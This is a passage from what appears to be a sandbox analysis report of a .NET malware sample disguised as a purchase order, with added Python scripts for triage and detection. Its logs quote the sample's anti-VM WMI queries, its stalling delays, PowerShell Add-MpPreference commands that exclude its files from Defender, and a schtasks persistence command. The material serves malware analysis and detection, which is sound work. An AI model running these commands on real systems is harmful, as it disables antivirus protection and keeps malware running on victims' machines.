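    """Return (process, event, value) or None for lines that are not process events."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m.group("proc"), m.group("event").strip(), m.group("value").strip()


@dataclass
class ProcessSummary:
    error_mode_sets: int = 0          # SetErrorMode calls carrying NOOPENFILEERRORBOX
    write_watch_allocs: int = 0       # VirtualAlloc MEM_RESERVE | MEM_WRITE_WATCH (CLR GC)
    max_timespan_waits: int = 0       # waits equal to TimeSpan.MaxValue (CLR idiom)
    other_delays_ms: list = field(default_factory=list)
    max_thread_delay_calls: int = 0   # largest 'threadDelayed N' seen for this process
    wmi_classes: set = field(default_factory=set)


def summarize(lines):
    """Aggregate behaviour lines per process image path."""
    summary = defaultdict(ProcessSummary)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, event, value = parsed
        s = summary[proc]
        if event == "Process information set" and "NOOPENFILEERRORBOX" in value:
            s.error_mode_sets += 1
        elif event == "Memory allocated" and "write watch" in value:
            s.write_watch_allocs += 1
        elif event == "Thread delayed":
            ms = int(value.rsplit(":", 1)[1])
            if ms == DOTNET_MAX_DELAY_MS:
                s.max_timespan_waits += 1
            else:
                s.other_delays_ms.append(ms)
        elif event == "Window / User API" and value.startswith("threadDelayed"):
            s.max_thread_delay_calls = max(s.max_thread_delay_calls, int(value.split()[1]))
        elif event == "WMI Queries":
            s.wmi_classes.add(value.rsplit(":", 1)[1].strip())
    return dict(summary)


def findings(s):
    """Turn one ProcessSummary into triage notes, separating evasion signals
    from behaviour any .NET process produces (rule set is an assumption)."""
    notes = []
    if s.wmi_classes & VM_WMI_CLASSES:
        notes.append("anti-VM: enumerates network adapters via WMI (MAC/vendor check)")
    if s.max_thread_delay_calls >= STALL_CALL_THRESHOLD:
        notes.append(f"stalling: {s.max_thread_delay_calls} delay calls from one thread")
    if s.error_mode_sets:
        notes.append(f"suppresses error dialogs: SetErrorMode called {s.error_mode_sets}x")
    if s.write_watch_allocs or s.max_timespan_waits:
        notes.append("CLR noise: write-watch heap and TimeSpan.MaxValue waits are normal for .NET")
    return notes


def triage(lines):
    """Map each process image path to its list of triage notes."""
    return {proc: findings(s) for proc, s in summarize(lines).items()}


# Constructed sample: a handful of lines copied from the report, in its own format.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: 7F0000 memory reserve | memory write watchJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7886Jump to behavior",
    "Source: Yara matchFile source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR",
]

if __name__ == "__main__":
    for proc, notes in triage(SAMPLE_LINES).items():
        print(proc)
        for n in notes:
            print("   ", n)
```

                    Feed it the full "Source:" lines of a report (e.g. after saving the page as text) and read the output per process: the RegSvcs.exe host in this report is the one that both queries adapter configuration and sets the error mode, while the write-watch and maximal-timespan entries should be read as CLR behaviour rather than as evidence.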

                    Malware Analysis System Evasion

                    Source: Yara match  File source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: C:\Windows\System32\conhost.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration  (2 occurrences)
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 7F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 2360000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 7760000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 8760000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 8920000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 9920000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: 9CA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: ACA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: BCA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: CFE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: DFE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: EFE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Memory allocated: F6D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 1090000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 2D70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 4D70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 7AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 8AA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 8C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 9C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 9FA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: AFA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 8C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: 9FA0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Memory allocated: AFA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe  Thread delayed: delay time: 922337203685477  (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477  (4 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe  Thread delayed: delay time: 922337203685477  (2 occurrences)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeWindow / User API: threadDelayed 1462Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeWindow / User API: threadDelayed 2203Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4151Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7886Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3420Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeWindow / User API: threadDelayed 1221Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeWindow / User API: threadDelayed 4208Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1048
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8815
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1216
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1256
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 938
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1020
                    Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 885
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe TID: 7748Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 4151 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 231 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7004Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe TID: 2128Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe TID: 3384Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1216 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1256 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 938 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 1020 > 30
                    Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 8028Thread sleep count: 885 > 30
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99775Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99558Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99412Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99241Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99108Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98959Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98463Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98353Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97917Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97810Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97695Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95110Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98451
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96803
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94531
                    Source: RegSvcs.exe, 0000000D.00000002.4115225187.0000000005A80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                    Source: jDCErdK.exe, 00000009.00000002.1780273695.00000000012B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: RegSvcs.exe, 00000008.00000002.1787426495.0000000006370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\purchase order - PO-011024-201.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jDCErdK.exe"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmpA55D.tmp"
Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe    Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jDCErdK" /XML "C:\Users\user\AppData\Local\Temp\tmp981A.tmp"
Source: C:\Users\user\AppData\Roaming\jDCErdK.exe    Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
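The process creations listed above are the three things a detection rule should key on: powershell.exe run with Add-MpPreference -ExclusionPath for the sample and its dropped copy, schtasks.exe /Create fed an /XML file from AppData\Local\Temp, and RegSvcs.exe started with no arguments by a binary living in Desktop or AppData\Roaming. The script below is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It runs those three rules over process-creation records that are constructed here to mirror the report's process tree (the ProcessEvent fields, rule names and benign control events are the example's own assumptions). Two practical details it handles: the parent is a 32-bit process, so the "System32\...\powershell.exe" it requests is redirected to SysWOW64, which is why the rules match on the image basename rather than the full path; and the same cmdlet is commonly hidden behind -EncodedCommand, so the rule decodes that argument (UTF-16LE, base64) before matching. The encoded event is constructed to demonstrate that decoding and was not observed in this analysis.

```python
"""
Detections for the evasion/persistence chain above: Defender exclusion added via
Add-MpPreference (plain or -EncodedCommand), schtasks /Create with an XML file in a
Temp directory, and RegSvcs.exe launched argument-less from a user-writable path.
All input events are constructed to mirror the report; none come from live telemetry.
"""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
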